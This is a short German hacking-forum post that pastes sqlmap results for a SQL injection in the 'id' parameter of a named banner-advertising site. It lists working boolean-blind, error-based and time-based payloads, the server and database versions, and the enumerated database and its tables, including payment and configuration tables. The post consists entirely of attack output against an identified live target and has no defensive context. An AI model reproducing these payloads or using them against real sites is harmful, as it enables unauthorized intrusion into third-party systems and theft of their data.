Anmelden
Benutzerkonto erstellen
http://www.vipbanner.de/wms/callturl.php?id=84
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (9298=9298) THEN 9298 ELSE 9298*(SELECT 9298 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=84 AND (SELECT 8822 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(8822=8822,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=84 AND (SELECT * FROM (SELECT(SLEEP(5)))AWor)
´web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] db00056702
[*] information_schema
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
Database: db00056702
[9 tables]
+-----------------+
| wms_b_reload |
| wms_banner |
| wms_bannerarten |
| wms_config |
| wms_p_reload |
| wms_payment |
| wms_popups |
| wms_t_reload |
| wms_textlinks |
+-----------------+
Bearbeitet von Osed28, 12 June 2015 - 20:31 Uhr.
Nach oben
Melden
Classic Hacking
Hacking & Security
